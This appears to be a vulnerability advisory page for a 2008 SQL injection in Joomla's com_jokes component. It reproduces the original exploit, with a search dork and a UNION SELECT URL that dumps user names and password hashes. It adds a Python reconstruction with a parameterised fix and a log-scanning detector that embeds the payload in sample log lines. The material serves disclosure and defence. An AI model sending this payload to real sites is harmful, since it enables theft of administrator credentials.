Vendor: jokes
By: S@BUN
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: jokes
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: N/A
CPE: a:atapin:jokes
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Joomla SQL Injection (com_jokes)

The 'cat' parameter of the com_jokes component (index.php?option=com_jokes&func=CatView) is used in a SQL query without validation, so an unauthenticated attacker can inject arbitrary SQL with a single crafted HTTP GET request. The published proof of concept is a nine-column UNION SELECT that reads usernames and password hashes from the Joomla 1.0 'mos_users' table: the /**/ sequences stand in for spaces, and the trailing /* comments out whatever follows the injected value in the original query. Disclosure of database contents (including administrator credential hashes) is the demonstrated impact; whether data can also be modified or deleted depends on the privileges of the database account and is not shown by the published exploit.

Mitigation:

The vendor has released an update to address this issue (see "Patch Exists" above). Users are advised to upgrade to the latest version of the component. Until the update is applied, the same class of bug is closed by treating 'cat' as an integer category id before it reaches the query (cast it, or pass it as a bound parameter rather than concatenating the raw request value) and by checking the other request parameters of the component for the same pattern.
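The following is an added illustration, not code from the component or from the advisory author. It reconstructs the bug class described above against an in-memory SQLite database: the 'cat' value is taken from the published PoC URL, concatenated into a hypothetical category query (the component's real query is not on this page; the nine-column table, the trailing "AND published=1" clause and the sample rows are assumptions made so the PoC's nine-column UNION and trailing /* line up), and then the same request is run through a hardened version that rejects non-integer ids and binds the value.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# The published PoC, exactly as it appears in the advisory.
POC_URL = ("index.php?option=com_jokes&Itemid=S@BUN&func=CatView"
           "&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8"
           "/**/from/**/mos_users/*")

# Constructed schema. mos_users is the Joomla 1.0 user table the PoC reads from;
# the nine-column mos_jokes_cats table and its rows are assumptions chosen so the
# PoC's nine-column UNION lines up (the real component's tables are not on the page).
SCHEMA = """
CREATE TABLE mos_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
CREATE TABLE mos_jokes_cats (
    id INTEGER PRIMARY KEY, parent INTEGER, name TEXT, image TEXT, description TEXT,
    published INTEGER, ordering INTEGER, access INTEGER, hits INTEGER
);
INSERT INTO mos_users VALUES (62, 'admin', '21232f297a57a5a743894a0e4a801fc3');
INSERT INTO mos_jokes_cats VALUES (1, 0, 'Puns', '', 'Short puns', 1, 1, 0, 0);
"""


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def cat_from_request(url):
    """Pull the raw 'cat' value out of the request, as the component would see it."""
    return parse_qs(urlsplit(url).query)["cat"][0]


def cat_view_vulnerable(conn, cat):
    """Hypothetical reconstruction of the bug: the raw parameter is concatenated into
    the query. The trailing AND clause is assumed; it is what the PoC's final /*
    comments out."""
    sql = "SELECT * FROM mos_jokes_cats WHERE id=" + cat + " AND published=1"
    return conn.execute(sql).fetchall()


def is_valid_cat(cat):
    """A category id is an integer and nothing else."""
    try:
        int(cat)
    except ValueError:
        return False
    return True


def cat_view_hardened(conn, cat):
    """Fix: refuse anything that is not an integer, and bind the value instead of
    concatenating it. Note that PHP's intval() would silently turn the PoC value
    into -776655; rejecting it outright is the stricter choice."""
    if not is_valid_cat(cat):
        raise ValueError("cat must be an integer category id")
    return conn.execute(
        "SELECT * FROM mos_jokes_cats WHERE id=? AND published=1", (int(cat),)
    ).fetchall()


if __name__ == "__main__":
    conn = build_db()
    cat = cat_from_request(POC_URL)
    # The UNION row comes back where a category row was expected: (…, 'admin', …, hash, …)
    print("vulnerable:", cat_view_vulnerable(conn, cat))
    print("hardened accepts PoC value:", is_valid_cat(cat))
    print("hardened, legitimate id 1:", cat_view_hardened(conn, "1"))
```

Columns 4 and 6 of the injected SELECT (username and password) land in the positions the original page renders, which is why the PoC numbers the other columns and puts the two interesting ones there; the exact positions are specific to the component's template and are assumed here.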

Exploit-DB raw data:

#########################################################################
#
# joomla SQL Injection(com_jokes)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_jokes"
#
########################################################################
EXPLOIT :

index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*

#########################################################################
# S@BUN                    www.hackturkiye.com                        S@BUN
#########################################################################
# S@BUN                             GOOD LUCKY                        S@BUN
#########################################################################


  <mosinstall type="component">
    <name>jokes</name>
    <creationDate>29/12/2005</creationDate>
    <author>Atapin</author>
    <copyright>Released under the GNU/GPL License</copyright>
    <authorEmail>info@atapin.net</authorEmail>

    <authorUrl>www.atapin.net</authorUrl>
    <version>1.0</version>
    <description></description>

# milw0rm.com [2008-01-30]
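The PoC above relies on /**/ in place of spaces and a trailing /* to slip past naive pattern matching, so a detection that looks for the literal string "union select" misses it. The following is an added example (not part of the exploit or the advisory) that normalises request parameters from web server access log lines, decoding percent-encoding, stripping C-style comments and collapsing whitespace, before looking for a UNION SELECT. The four log lines are constructed, not real traffic: a benign request, the advisory's PoC verbatim, and two re-encodings of it.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed Apache combined-format lines (not real traffic): a benign request, the
# advisory's PoC verbatim, a percent-encoded upper-case variant, and a '+'-for-space
# variant that ends the query with '--' instead of '/*'.
LOG_LINES = [
    '10.0.0.5 - - [30/Jan/2008:10:12:01 +0000] "GET /index.php?option=com_jokes&func=CatView&cat=5 HTTP/1.1" 200 4123 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [30/Jan/2008:10:12:07 +0000] "GET /index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/* HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [30/Jan/2008:10:12:09 +0000] "GET /index.php?option=com_jokes&func=CatView&cat=-1%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F0,1,2,3,username,5,password,7,8%2F%2A%2A%2FFROM%2F%2A%2A%2Fmos_users%2F%2A HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [30/Jan/2008:10:12:11 +0000] "GET /index.php?option=com_jokes&func=CatView&cat=-1+union+select+0,1,2,3,username,5,password,7,8+from+mos_users-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d')
# Terminated C-style comments first, then an unterminated one running to the end.
COMMENT_RE = re.compile(r"/\*.*?\*/|/\*.*$", re.S)
UNION_RE = re.compile(r"\bunion\b\s+(?:all\s+)?select\b")


def normalize(value):
    """Undo the obfuscation the PoC relies on: percent-decode (twice, to catch double
    encoding), replace comments with spaces, collapse whitespace, lower-case."""
    decoded = unquote_plus(unquote_plus(value))
    decoded = COMMENT_RE.sub(" ", decoded)
    return re.sub(r"\s+", " ", decoded).strip().lower()


def injected_params(line):
    """Return [(param, normalized_value)] for every query parameter of the request in
    this log line that carries a UNION SELECT once normalized."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    hits = []
    for name, values in params.items():
        for raw in values:
            norm = normalize(raw)
            if UNION_RE.search(norm):
                hits.append((name, norm))
    return hits


def scan(lines):
    """Indexes of the log lines that carry a UNION-based injection in any parameter."""
    return [i for i, line in enumerate(lines) if injected_params(line)]


if __name__ == "__main__":
    for i in scan(LOG_LINES):
        for name, norm in injected_params(LOG_LINES[i]):
            print(f"line {i}: param {name!r} -> {norm}")
```

Normalising before matching is the point: all three injected variants reduce to the same "-N union select ... from mos_users" string, so one rule covers the comment-padded, percent-encoded and plus-encoded forms, while the benign cat=5 request is untouched. A matching rule on "from mos_users" (or whatever table prefix the site uses) narrows the signature to credential-reading attempts specifically.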